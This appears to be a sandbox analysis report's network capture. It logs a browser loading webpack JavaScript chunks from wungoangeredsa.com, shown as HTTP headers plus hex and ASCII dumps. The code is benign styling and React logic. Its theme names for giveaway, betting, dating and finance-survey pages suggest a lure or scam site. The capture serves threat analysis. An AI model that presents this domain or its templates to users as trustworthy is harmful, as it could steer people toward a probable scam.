                                                                                                          2025-01-06 11:09:20 UTC553OUTGET /_next/static/chunks/b88eab57f2676fbf-1736072686539.7179d464977285be.js HTTP/1.1
                                                                                                          Host: wungoangeredsa.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: script
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2025-01-06 11:09:20 UTC496INHTTP/1.1 200 OK
                                                                                                          Date: Mon, 06 Jan 2025 11:09:20 GMT
                                                                                                          Content-Type: application/javascript
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Last-Modified: Sun, 05 Jan 2025 10:29:40 GMT
                                                                                                          Vary: Accept-Encoding
                                                                                                          ETag: W/"677a5f14-5df2"
                                                                                                          Strict-Transport-Security: max-age=1
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 1625
                                                                                                          Expires: Mon, 06 Jan 2025 12:09:20 GMT
                                                                                                          Cache-Control: public, max-age=3600
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fdb415a9d695e76-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          2025-01-06 11:09:20 UTC873INData Raw: 35 64 66 32 0d 0a 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 35 39 38 30 31 2c 37 36 34 33 35 5d 2c 7b 37 36 34 33 35 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 65 2c 69 29 7b 69 2e 64 28 65 2c 7b 67 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 7d 7d 29 3b 76 61 72 20 6f 3d 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 65 3d 6e 2e 69 6d 61 67 65 73 4d 61 70 2c 69 3d 6e 2e 72 65 71 75 65 73 74 65 64 49 6d 61 67 65 2c 6f 3d 6e 2e 61 64 64 69 74 69 6f 6e 61 6c 50 72 6f 70 65 72 74 69 65 73 3b 69 66 28 69 29 7b 76 61 72 20 64 3d 65 5b 69 5d 3b 72 65 74 75 72 6e 20 6f 26 26 28 6f 2e 69
                                                                                                          Data Ascii: 5df2"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[59801,76435],{76435:function(n,e,i){i.d(e,{g:function(){return o}});var o=function(n){var e=n.imagesMap,i=n.requestedImage,o=n.additionalProperties;if(i){var d=e[i];return o&&(o.i
                                                                                                          2025-01-06 11:09:20 UTC1369INData Raw: 29 7b 69 2e 64 28 65 2c 7b 68 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 57 7d 7d 29 3b 76 61 72 20 6f 3d 69 28 35 36 37 35 33 29 2c 64 3d 69 28 34 37 37 34 37 29 2c 72 3d 69 28 35 33 34 34 34 29 2c 74 3d 69 28 31 32 31 33 39 29 2c 6c 3d 69 28 39 32 32 32 38 29 2c 75 3d 69 28 39 33 38 38 38 29 3b 66 75 6e 63 74 69 6f 6e 20 61 28 29 7b 76 61 72 20 6e 3d 28 30 2c 6c 2e 5a 29 28 5b 22 5c 6e 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 5c 6e 20 20 67 61 70 3a 20 30 2e 35 72 65 6d 3b 5c 6e 20 20 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 37 36 38 70 78 29 20 7b 5c 6e 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 5c 6e 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 5c 6e 20 20 7d 5c 6e 22 5d
                                                                                                          Data Ascii: ){i.d(e,{h:function(){return W}});var o=i(56753),d=i(47747),r=i(53444),t=i(12139),l=i(92228),u=i(93888);function a(){var n=(0,l.Z)(["\n display: flex;\n gap: 0.5rem;\n @media (min-width: 768px) {\n width: 100%;\n justify-content: center;\n }\n"]
                                                                                                          2025-01-06 11:09:20 UTC1369INData Raw: 38 39 33 29 3b 66 75 6e 63 74 69 6f 6e 20 70 28 29 7b 76 61 72 20 6e 3d 28 30 2c 6c 2e 5a 29 28 5b 22 5c 6e 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 36 38 30 70 78 3b 5c 6e 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 5c 6e 20 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 5c 6e 22 5d 29 3b 72 65 74 75 72 6e 20 70 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 7d 2c 6e 7d 66 75 6e 63 74 69 6f 6e 20 46 28 29 7b 76 61 72 20 6e 3d 28 30 2c 6c 2e 5a 29 28 5b 22 5c 6e 20 20 66 6c 65 78 3a 20 31 3b 5c 6e 22 5d 29 3b 72 65 74 75 72 6e 20 46 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 7d 2c 6e 7d 66 75 6e 63 74 69 6f 6e 20 78 28 29 7b 76 61 72 20 6e 3d 28 30 2c 6c 2e 5a 29 28 5b 22 5c 6e 20 20 70 6f 69 6e 74 65 72 2d
                                                                                                          Data Ascii: 893);function p(){var n=(0,l.Z)(["\n max-width: 680px;\n position: relative;\n margin: 0 auto;\n"]);return p=function(){return n},n}function F(){var n=(0,l.Z)(["\n flex: 1;\n"]);return F=function(){return n},n}function x(){var n=(0,l.Z)(["\n pointer-
                                                                                                          2025-01-06 11:09:20 UTC1369INData Raw: 3a 32 33 7d 5d 2c 5b 22 49 4e 22 2c 7b 73 72 63 3a 22 2f 5f 6e 65 78 74 2f 73 74 61 74 69 63 2f 6d 65 64 69 61 2f 49 4e 2e 32 37 65 66 65 30 38 65 2e 73 76 67 22 2c 68 65 69 67 68 74 3a 31 35 2c 77 69 64 74 68 3a 32 31 7d 5d 2c 5b 22 42 52 22 2c 7b 73 72 63 3a 22 2f 5f 6e 65 78 74 2f 73 74 61 74 69 63 2f 6d 65 64 69 61 2f 42 52 2e 37 62 31 62 63 31 64 64 2e 73 76 67 22 2c 68 65 69 67 68 74 3a 31 37 2c 77 69 64 74 68 3a 32 33 7d 5d 2c 5b 22 4e 47 22 2c 7b 73 72 63 3a 22 2f 5f 6e 65 78 74 2f 73 74 61 74 69 63 2f 6d 65 64 69 61 2f 4e 47 2e 37 66 33 36 33 64 31 39 2e 73 76 67 22 2c 68 65 69 67 68 74 3a 31 37 2c 77 69 64 74 68 3a 32 33 7d 5d 2c 5b 22 4d 5a 22 2c 7b 73 72 63 3a 22 2f 5f 6e 65 78 74 2f 73 74 61 74 69 63 2f 6d 65 64 69 61 2f 4d 5a 2e 36 63 31 37
                                                                                                          Data Ascii: :23}],["IN",{src:"/_next/static/media/IN.27efe08e.svg",height:15,width:21}],["BR",{src:"/_next/static/media/BR.7b1bc1dd.svg",height:17,width:23}],["NG",{src:"/_next/static/media/NG.7f363d19.svg",height:17,width:23}],["MZ",{src:"/_next/static/media/MZ.6c17
                                                                                                          2025-01-06 11:09:20 UTC1369INData Raw: 2d 77 69 64 74 68 3a 20 37 36 38 70 78 29 20 7b 5c 6e 20 20 20 20 70 61 64 64 69 6e 67 3a 20 22 2c 22 3b 5c 6e 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 22 2c 22 3b 5c 6e 20 20 7d 5c 6e 20 20 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 31 30 32 34 70 78 29 20 7b 5c 6e 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 22 2c 22 3b 5c 6e 20 20 7d 5c 6e 22 5d 29 3b 72 65 74 75 72 6e 20 43 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 7d 2c 6e 7d 66 75 6e 63 74 69 6f 6e 20 5f 28 29 7b 76 61 72 20 6e 3d 28 30 2c 6c 2e 5a 29 28 5b 22 5c 6e 20 20 63 6f 6c 6f 72 3a 20 22 2c 22 3b 5c 6e 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 22 2c 22 3b 5c 6e 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 22 2c 22 3b 5c 6e 20 20 40 6d 65 64 69 61 20 28 6d 69
                                                                                                          Data Ascii: -width: 768px) {\n padding: ",";\n font-size: ",";\n }\n @media (min-width: 1024px) {\n font-size: ",";\n }\n"]);return C=function(){return n},n}function _(){var n=(0,l.Z)(["\n color: ",";\n font-size: ",";\n font-weight: ",";\n @media (mi
                                                                                                          2025-01-06 11:09:20 UTC1369INData Raw: 20 63 6f 6c 6f 72 3a 20 22 2c 22 3b 5c 6e 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 22 2c 22 3b 5c 6e 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 22 2c 22 3b 5c 6e 20 20 20 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 22 2c 22 3b 5c 6e 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 22 2c 22 3b 5c 6e 20 20 20 20 70 61 64 64 69 6e 67 3a 20 22 2c 22 3b 5c 6e 20 20 20 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 22 2c 22 3b 5c 6e 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 22 2c 22 3b 5c 6e 20 20 20 20 6d 61 72 67 69 6e 3a 20 22 2c 22 3b 5c 6e 20 20 20 20 64 69 73 70 6c 61 79 3a 20 22 2c 22 3b 5c 6e 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 2d 63 6f 6c 6f 72 3a 20 22 2c 22 3b 5c 6e 20 20 20 20 74 65 78 74 2d 64 65
                                                                                                          Data Ascii: color: ",";\n font-size: ",";\n font-weight: ",";\n letter-spacing: ",";\n line-height: ",";\n padding: ",";\n padding-bottom: ",";\n text-align: ",";\n margin: ",";\n display: ",";\n text-decoration-color: ",";\n text-de
                                                                                                          2025-01-06 11:09:20 UTC1369INData Raw: 61 6e 63 65 53 75 72 76 65 79 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 65 7c 7c 6e 75 6c 6c 3d 3d 3d 28 69 3d 65 2e 68 65 61 64 65 72 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 69 3f 76 6f 69 64 20 30 3a 69 2e 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 29 7c 7c 22 74 72 61 6e 73 70 61 72 65 6e 74 22 7d 29 2c 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 65 2c 69 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 3d 28 65 3d 6e 2e 74 68 65 6d 65 2e 73 68 61 72 65 64 46 69 6e 61 6e 63 65 53 75 72 76 65 79 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 65 7c 7c 6e 75 6c 6c 3d 3d 3d 28 69 3d 65 2e 68 65 61 64 65 72 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 69 3f 76 6f 69 64 20 30 3a 69 2e 70 61 64 64 69 6e 67 7d 29 2c 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 65 2c 69 3b 72 65 74
                                                                                                          Data Ascii: anceSurvey)||void 0===e||null===(i=e.header)||void 0===i?void 0:i.backgroundColor)||"transparent"}),(function(n){var e,i;return null===(e=n.theme.sharedFinanceSurvey)||void 0===e||null===(i=e.header)||void 0===i?void 0:i.padding}),(function(n){var e,i;ret
                                                                                                          2025-01-06 11:09:20 UTC1369INData Raw: 65 7c 7c 6e 75 6c 6c 3d 3d 3d 28 69 3d 65 2e 68 65 61 64 65 72 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 69 3f 76 6f 69 64 20 30 3a 69 2e 66 6c 65 78 44 69 72 65 63 74 69 6f 6e 7d 29 2c 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 65 2c 69 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 3d 28 65 3d 6e 2e 74 68 65 6d 65 2e 73 68 61 72 65 64 46 69 6e 61 6e 63 65 53 75 72 76 65 79 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 65 7c 7c 6e 75 6c 6c 3d 3d 3d 28 69 3d 65 2e 68 65 61 64 65 72 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 69 3f 76 6f 69 64 20 30 3a 69 2e 77 69 64 74 68 7d 29 2c 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 65 2c 69 2c 6f 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 3d 28 65 3d 6e 2e 74 68 65 6d 65 2e 73 68 61 72 65 64 46 69 6e 61 6e 63 65 53 75 72 76 65
                                                                                                          Data Ascii: e||null===(i=e.header)||void 0===i?void 0:i.flexDirection}),(function(n){var e,i;return null===(e=n.theme.sharedFinanceSurvey)||void 0===e||null===(i=e.header)||void 0===i?void 0:i.width}),(function(n){var e,i,o;return null===(e=n.theme.sharedFinanceSurve
                                                                                                          2025-01-06 11:09:20 UTC1369INData Raw: 6f 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 3d 28 65 3d 6e 2e 74 68 65 6d 65 2e 73 68 61 72 65 64 46 69 6e 61 6e 63 65 53 75 72 76 65 79 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 65 7c 7c 6e 75 6c 6c 3d 3d 3d 28 69 3d 65 2e 68 65 61 64 65 72 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 69 7c 7c 6e 75 6c 6c 3d 3d 3d 28 6f 3d 69 2e 74 65 78 74 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 6f 3f 76 6f 69 64 20 30 3a 6f 2e 62 6f 72 64 65 72 52 61 64 69 75 73 7d 29 2c 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 65 2c 69 2c 6f 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 3d 28 65 3d 6e 2e 74 68 65 6d 65 2e 73 68 61 72 65 64 46 69 6e 61 6e 63 65 53 75 72 76 65 79 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 65 7c 7c 6e 75 6c 6c 3d 3d 3d 28 69 3d 65 2e 68 65 61 64 65 72 29 7c 7c 76 6f 69 64
                                                                                                          Data Ascii: o;return null===(e=n.theme.sharedFinanceSurvey)||void 0===e||null===(i=e.header)||void 0===i||null===(o=i.text)||void 0===o?void 0:o.borderRadius}),(function(n){var e,i,o;return null===(e=n.theme.sharedFinanceSurvey)||void 0===e||null===(i=e.header)||void
                                                                                                          2025-01-06 11:09:20 UTC1369INData Raw: 6f 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 3d 28 65 3d 6e 2e 74 68 65 6d 65 2e 73 68 61 72 65 64 46 69 6e 61 6e 63 65 53 75 72 76 65 79 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 65 7c 7c 6e 75 6c 6c 3d 3d 3d 28 69 3d 65 2e 68 65 61 64 65 72 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 69 7c 7c 6e 75 6c 6c 3d 3d 3d 28 6f 3d 69 2e 74 65 78 74 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 6f 3f 76 6f 69 64 20 30 3a 6f 2e 6c 69 6e 65 48 65 69 67 68 74 4d 65 64 69 61 31 30 32 34 7d 29 2c 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 65 2c 69 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 3d 28 65 3d 6e 2e 74 68 65 6d 65 2e 73 68 61 72 65 64 46 69 6e 61 6e 63 65 53 75 72 76 65 79 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 65 7c 7c 6e 75 6c 6c 3d 3d 3d 28 69 3d 65 2e 68 65 61 64 65 72 29 7c
                                                                                                          Data Ascii: o;return null===(e=n.theme.sharedFinanceSurvey)||void 0===e||null===(i=e.header)||void 0===i||null===(o=i.text)||void 0===o?void 0:o.lineHeightMedia1024}),(function(n){var e,i;return null===(e=n.theme.sharedFinanceSurvey)||void 0===e||null===(i=e.header)|


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          27192.168.2.450072104.18.2.44438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:09:20 UTC553OUTGET /_next/static/chunks/2d343433e1c8b3ac-1736072686539.2dbd5874240e877f.js HTTP/1.1
                                                                                                          Host: wungoangeredsa.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: script
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2025-01-06 11:09:21 UTC496INHTTP/1.1 200 OK
                                                                                                          Date: Mon, 06 Jan 2025 11:09:21 GMT
                                                                                                          Content-Type: application/javascript
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Last-Modified: Sun, 05 Jan 2025 10:29:40 GMT
                                                                                                          Vary: Accept-Encoding
                                                                                                          ETag: W/"677a5f14-422e"
                                                                                                          Strict-Transport-Security: max-age=1
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 1054
                                                                                                          Expires: Mon, 06 Jan 2025 12:09:21 GMT
                                                                                                          Cache-Control: public, max-age=3600
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fdb415e7dbe42d3-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          2025-01-06 11:09:21 UTC873INData Raw: 34 32 32 65 0d 0a 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 38 32 30 33 2c 36 39 36 37 34 2c 34 32 32 35 31 2c 35 30 32 39 37 5d 2c 7b 34 38 30 34 35 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 74 2e 64 28 65 2c 7b 68 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 61 7d 7d 29 3b 76 61 72 20 72 3d 74 28 31 32 31 33 39 29 2c 69 3d 74 28 32 39 37 35 34 29 3b 66 75 6e 63 74 69 6f 6e 20 61 28 6e 29 7b 76 61 72 20 65 3d 28 30 2c 72 2e 75 73 65 53 74 61 74 65 29 28 76 6f 69 64 20 30 29 2c 74 3d 65 5b 30 5d 2c 61 3d 65 5b 31 5d 2c 6f 3d 28 30 2c 72 2e 75 73 65 53 74 61 74 65 29 28
                                                                                                          Data Ascii: 422e(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[8203,69674,42251,50297],{48045:function(n,e,t){"use strict";t.d(e,{h:function(){return a}});var r=t(12139),i=t(29754);function a(n){var e=(0,r.useState)(void 0),t=e[0],a=e[1],o=(0,r.useState)(
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 69 67 6e 22 2c 75 2e 74 6f 53 74 72 69 6e 67 28 29 29 2c 73 28 21 30 29 7d 61 28 75 29 7d 7d 29 2c 5b 63 5d 29 2c 28 30 2c 72 2e 75 73 65 45 66 66 65 63 74 29 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 73 28 21 31 29 7d 29 2c 5b 5d 29 2c 74 7d 7d 2c 37 33 34 37 30 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 74 2e 64 28 65 2c 7b 59 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 61 7d 7d 29 3b 76 61 72 20 72 3d 74 28 36 36 33 38 33 29 2c 69 3d 74 28 31 32 31 33 39 29 2c 61 3d 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 65 3d 28 30 2c 69 2e 75 73 65 53 74 61 74 65 29 28 21 31 29 2c 74 3d 65 5b 30 5d 2c 61 3d 65 5b 31 5d 2c 6f 3d 28 30 2c 69 2e 75 73 65 53 74 61 74 65 29 28 29 2c 63 3d 6f 5b 30 5d 2c 73
                                                                                                          Data Ascii: ign",u.toString()),s(!0)}a(u)}}),[c]),(0,r.useEffect)((function(){s(!1)}),[]),t}},73470:function(n,e,t){"use strict";t.d(e,{Y:function(){return a}});var r=t(66383),i=t(12139),a=function(n){var e=(0,i.useState)(!1),t=e[0],a=e[1],o=(0,i.useState)(),c=o[0],s
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 35 5d 3d 22 42 4c 41 43 4b 5f 52 45 44 22 2c 6e 5b 6e 2e 46 49 4e 41 4e 43 45 5f 52 41 54 49 4e 47 5f 47 52 45 45 4e 3d 36 5d 3d 22 46 49 4e 41 4e 43 45 5f 52 41 54 49 4e 47 5f 47 52 45 45 4e 22 2c 6e 5b 6e 2e 4d 4f 4e 45 59 3d 37 5d 3d 22 4d 4f 4e 45 59 22 2c 6e 5b 6e 2e 47 49 56 45 41 57 41 59 3d 38 5d 3d 22 47 49 56 45 41 57 41 59 22 2c 6e 5b 6e 2e 42 4c 41 43 4b 5f 42 4c 55 45 3d 39 5d 3d 22 42 4c 41 43 4b 5f 42 4c 55 45 22 7d 28 72 7c 7c 28 72 3d 7b 7d 29 29 7d 2c 32 37 39 35 31 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 72 3b 74 2e 64 28 65 2c 7b 69 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 7d 7d 29 2c 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 6e 2e 62 6c 61 63 6b 3d 22 62 6c 61
                                                                                                          Data Ascii: 5]="BLACK_RED",n[n.FINANCE_RATING_GREEN=6]="FINANCE_RATING_GREEN",n[n.MONEY=7]="MONEY",n[n.GIVEAWAY=8]="GIVEAWAY",n[n.BLACK_BLUE=9]="BLACK_BLUE"}(r||(r={}))},27951:function(n,e,t){"use strict";var r;t.d(e,{i:function(){return r}}),function(n){n.black="bla
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 3d 22 67 72 6f 63 65 72 79 53 74 6f 72 65 57 68 69 74 65 22 2c 6e 2e 62 65 74 74 69 6e 67 46 6f 6f 74 62 61 6c 6c 3d 22 62 65 74 74 69 6e 67 46 6f 6f 74 62 61 6c 6c 22 2c 6e 2e 6d 6f 62 69 6c 65 47 69 76 65 61 77 61 79 50 69 6e 6b 3d 22 6d 6f 62 69 6c 65 47 69 76 65 61 77 61 79 50 69 6e 6b 22 2c 6e 2e 6d 6f 62 69 6c 65 47 69 76 65 61 77 61 79 47 72 65 65 6e 3d 22 6d 6f 62 69 6c 65 47 69 76 65 61 77 61 79 47 72 65 65 6e 22 2c 6e 2e 66 69 6e 61 6e 63 65 47 69 76 65 61 77 61 79 3d 22 66 69 6e 61 6e 63 65 47 69 76 65 61 77 61 79 22 2c 6e 2e 62 65 74 74 69 6e 67 53 75 72 76 65 79 3d 22 62 65 74 74 69 6e 67 53 75 72 76 65 79 22 2c 6e 2e 67 72 65 65 6e 42 75 74 74 6f 6e 3d 22 67 72 65 65 6e 42 75 74 74 6f 6e 22 2c 6e 2e 64 61 74 69 6e 67 41 49 3d 22 64 61 74 69
                                                                                                          Data Ascii: ="groceryStoreWhite",n.bettingFootball="bettingFootball",n.mobileGiveawayPink="mobileGiveawayPink",n.mobileGiveawayGreen="mobileGiveawayGreen",n.financeGiveaway="financeGiveaway",n.bettingSurvey="bettingSurvey",n.greenButton="greenButton",n.datingAI="dati
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 5c 6e 20 20 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 5c 6e 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 35 3b 5c 6e 20 20 66 6f 6e 74 3a 20 69 6e 68 65 72 69 74 3b 5c 6e 5c 6e 20 20 63 75 72 73 6f 72 3a 20 6e 6f 74 2d 61 6c 6c 6f 77 65 64 3b 5c 6e 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 70 75 6c 73 65 20 32 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 34 2c 20 30 2c 20 30 2e 36 2c 20 31 29 20 69 6e 66 69 6e 69 74 65 3b 5c 6e 5c 6e 20 20 70 6c 61 63 65 2d 73 65 6c 66 3a 20 63 65 6e 74 65 72 3b 5c 6e 5c 6e 20 20 26 3a 64 69 73 61 62 6c 65 64 20 7b 5c 6e 20 20 20 20 6f 70 61 63 69 74 79 3a 20 30 2e 37 3b 5c 6e 20 20 7d 5c 6e 22 5d 29 3b 72 65 74 75 72 6e 20 6d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 7d 2c 6e 7d 76 61 72 20
                                                                                                          Data Ascii: \n color: #ffffff;\n line-height: 1.5;\n font: inherit;\n\n cursor: not-allowed;\n animation: pulse 2s cubic-bezier(0.4, 0, 0.6, 1) infinite;\n\n place-self: center;\n\n &:disabled {\n opacity: 0.7;\n }\n"]);return m=function(){return n},n}var
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 30 3b 5c 6e 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 33 33 33 3b 5c 6e 20 20 70 6c 61 63 65 2d 73 65 6c 66 3a 20 63 65 6e 74 65 72 3b 5c 6e 20 20 26 3a 68 6f 76 65 72 20 7b 5c 6e 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 5c 6e 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 5c 6e 20 20 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 64 64 64 3b 5c 6e 20 20 7d 5c 6e 22 5d 29 3b 72 65 74 75 72 6e 20 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 7d 2c 6e 7d 65 2e 64 65 66 61 75 6c 74 3d 28 30 2c 69 2e 69 76 29 28 61 28 29 29 7d 2c 35 39 36 37 34 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 72 3b 74 2e 64 28 65 2c 7b 69 3a 66 75 6e 63 74 69
                                                                                                          Data Ascii: 0;\n border: 1px solid #333;\n place-self: center;\n &:hover {\n color: #000;\n background: #fff;\n border-color: #ddd;\n }\n"]);return a=function(){return n},n}e.default=(0,i.iv)(a())},59674:function(n,e,t){"use strict";var r;t.d(e,{i:functi
